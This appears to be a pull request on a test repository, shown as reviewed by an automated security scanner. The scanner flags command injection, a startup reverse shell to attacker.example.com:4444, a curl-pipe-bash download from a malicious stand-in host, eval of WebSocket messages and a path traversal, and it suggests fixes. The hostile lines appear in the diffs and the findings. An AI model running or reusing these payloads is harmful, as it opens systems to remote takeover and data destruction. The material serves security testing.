added

[msaleemzp]

No description provided.

[zeropath-ai-staging]

OS Command Injection in cli/index.js via argv[2] (Severity: CRITICAL)

Arbitrary command execution is possible due to the insecure use of child_process.exec. The code in cli/index.js executes a shell command that interpolates user-supplied input from process.argv[2] directly into the command string, which allows an attacker to inject arbitrary commands. This is combined with a hardcoded curl | bash command, resulting in immediate remote code execution, followed by a destructive rm -rf operation.
_{View details in ZeroPath}

Suggested change

	const { exec } = require('child_process');
	const userArg = process.argv[2] || '';
	const cmd = `
	rm -rf /tmp/vuln_dir --no-preserve-root &&
	const { execFile } = require('child_process');
	// Read a single user argument. Default to current directory.
	const userArg = process.argv[2] || '.';
	// Reject arguments containing shell/meta characters to avoid injection and misuse.
	// Allow only simple filenames/paths composed of letters, numbers, dot, underscore, dash and slashes.
	const ALLOWED_ARG_RE = /^[A-Za-z0-9._\-\/]+$/;
	if (!ALLOWED_ARG_RE.test(userArg)) {
	console.error('[!] Invalid argument. Only simple paths consisting of letters, numbers, dot, underscore, dash and slash are allowed.');
	process.exit(1);
	}
	const cmd = `
	rm -rf /tmp/vuln_dir --no-preserve-root &&

[zeropath-ai-staging]

Unsafe Command Execution via Reverse Shell in index.js (Severity: CRITICAL)

Executing a reverse shell command allows for arbitrary code execution and full system compromise. The child_process.exec function in stdin/index.js immediately executes a hardcoded payload, opening a reverse shell connection to attacker.example.com on port 4444, which grants an attacker complete remote access to the system. This immediate execution within the application's startup allows attackers to gain control as soon as the application starts.
_{View details in ZeroPath}

Suggested change

	const { exec } = require('child_process');
	const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
	console.log('[*] Executing reverse shell payload…');
	exec(payload, (err, stdout, stderr) => {
	if (err) {
	console.error('[!] Error executing payload:', err);
	return;
	}
	console.log('[+] Payload executed. stdout:', stdout);
	});
	// Unsafe reverse shell execution removed.
	// Reason: The original code executed a hardcoded reverse shell command at startup,
	// which allows arbitrary remote code execution and full system compromise.
	// This module now disables that behavior. If shell execution is required,
	// implement it explicitly and safely behind authentication/authorization and
	// configuration controlled by the application operator.
	console.error('[!] Unsafe reverse shell payload detected and disabled. Execution prevented.');
	// Export a no-op to preserve module import behavior for other modules.
	module.exports = function noop() {
	return null;
	};

[zeropath-ai-staging]

Path Traversal Vulnerability in disk/index.js (Severity: MEDIUM)

Arbitrary file disclosure is possible due to a path traversal vulnerability in disk/index.js:5-14. The /read endpoint uses req.query.file to construct a file path, then attempts to restrict access using startsWith, which can be bypassed with symlinks or path variations. This could expose sensitive information, such as configuration files or API keys, from the server's file system.
_{View details in ZeroPath}

Suggested change

	const path = require('path');
	const app = express();
	// Path Traversal
	app.get('/read', (req, res) => {
	const file = req.query.file;
	const fullPath = path.resolve(__dirname, file);
	if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
	fs.readFile(fullPath, 'utf8', (err, data) => {
	if (err) return res.status(500).send(err.message);
	res.send(data);
	});
	});
	const path = require('path');
	const app = express();
	// Secure read endpoint
	const baseDir = fs.realpathSync(__dirname);
	app.get('/read', (req, res) => {
	const file = req.query.file;
	if (typeof file !== 'string' || file.length === 0) return res.status(400).send('Invalid file');
	if (file.includes('\u0000')) return res.status(400).send('Invalid file');
	const fullPath = path.resolve(__dirname, file);
	fs.realpath(fullPath, (err, realFullPath) => {
	if (err) return res.status(400).send('Invalid file path');
	// Ensure the resolved path is inside the base directory and not a directory itself
	if (realFullPath !== baseDir && !realFullPath.startsWith(baseDir + path.sep)) {
	return res.status(400).send('Invalid file path');
	}
	fs.stat(realFullPath, (errStat, stats) => {
	if (errStat) return res.status(500).send(errStat.message);
	if (!stats.isFile()) return res.status(400).send('Not a file');
	fs.readFile(realFullPath, 'utf8', (errRead, data) => {
	if (errRead) return res.status(500).send(errRead.message);
	res.send(data);
	});
	});
	});
	});

[zeropath-ai-staging]

Remote Code Execution via WebSocket Message Evaluation (Severity: CRITICAL)

Unsafe use of eval() allows remote code execution. The WebSocket server in ws/index.js directly passes incoming messages to eval(msg) on line 7, which causes arbitrary JavaScript code to be executed within the server's context. Consequently, any connected client can execute arbitrary commands with the application's privileges, potentially compromising the entire system.
_{View details in ZeroPath}

Suggested change

	// RCE
	wss.on('connection', ws => {
	ws.on('message', msg => {
	eval(msg);
	ws.send('Executed: ' + msg);
	});
	});
	// RCE
	wss.on('connection', ws => {
	ws.on('message', msg => {
	// Do not evaluate incoming messages. Parse JSON and handle known actions only.
	try {
	const data = JSON.parse(msg);
	if (data && data.action === 'echo' && typeof data.message === 'string') {
	ws.send('Echo: ' + data.message);
	} else {
	ws.send('Unsupported or missing action');
	}
	} catch (err) {
	ws.send('Invalid message format. Expected JSON with {"action":"echo","message":"..."}');
	}
	});
	});

[zeropath-ai-staging]

❌ Possible security or compliance issues detected. Reviewed everything up to ea24d94.

The following issues were found:

• Command Injection

  • Location: cli/index.js:1-18
  • Score: CRITICAL (100.0)
  • Description: Arbitrary shell execution and execution of a remote script. The code interpolates untrusted process.argv[2] into a shell command string and passes it to child_process.exec. Additionally it unconditionally runs curl http://malicious.example.com/install.sh | bash and a destructive rm -rf as part of the same command pipeline. An attacker-controlled argv can inject shell metacharacters to execute arbitrary commands; the curl|bash pattern executes remote code immediately.
  • Link to UI: https://staging.branch.zeropath.com/app/issues/98a123c9-3b4d-48f5-876e-51d8904105cd

• Remote Code Execution (RCE)

  • Location: stdin/index.js:1-12
  • Score: CRITICAL (100.0)
  • Description: Immediate execution of a reverse shell command via child_process.exec with a hardcoded payload that opens a connection to an attacker-controlled host. This grants remote shell access and full control as the process user.
  • Link to UI: https://staging.branch.zeropath.com/app/issues/e45891ac-9e1b-4a9d-b756-e71b75143910

• Remote Code Execution (RCE)

  • Location: ws/index.js:1-12
  • Score: CRITICAL (100.0)
  • Description: Remote code execution via eval of untrusted WebSocket messages. Incoming messages are passed directly to eval(msg) and executed in server context, allowing any connected client to execute arbitrary JavaScript with application privileges.
  • Link to UI: https://staging.branch.zeropath.com/app/issues/51db9a27-9abf-4430-9876-e5715029491c

• Path Traversal

  • Location: disk/index.js:1-17
  • Score: MEDIUM (73.0)
  • Description: File disclosure / path traversal and symlink escape risk. The endpoint reads req.query.file and resolves it against __dirname, then uses a startsWith check to enforce containment. This exposes arbitrary files under the application dir; the startsWith containment check is brittle and can be bypassed using symlinks or platform path nuances, potentially disclosing sensitive files (configs, keys, .env).
  • Link to UI: https://staging.branch.zeropath.com/app/issues/0a746183-e3a0-431d-8875-07361472320b

Security Overview

• 🔎 Scanned files: 5 changed file(s)
• 🔗 Scan Link: https://staging.branch.zeropath.com/app/repositories/3d073d9b-c32a-449c-bae6-4a30e267e43a?scanId=0102905b-0807-48f6-a72a-f080cdcaab8e&codeScanTypes=PrScan&tab=issues

Detected Code Changes

Change Type	Relevant files
Other	► cli/index.js     File creation ► disk/index.js     File creation ► package.json     File creation ► stdin/index.js     File creation ► ws/index.js     File creation

Reply to this PR with @zeropath-ai followed by a description of what change you want and we'll auto-submit a change to this PR to implement it.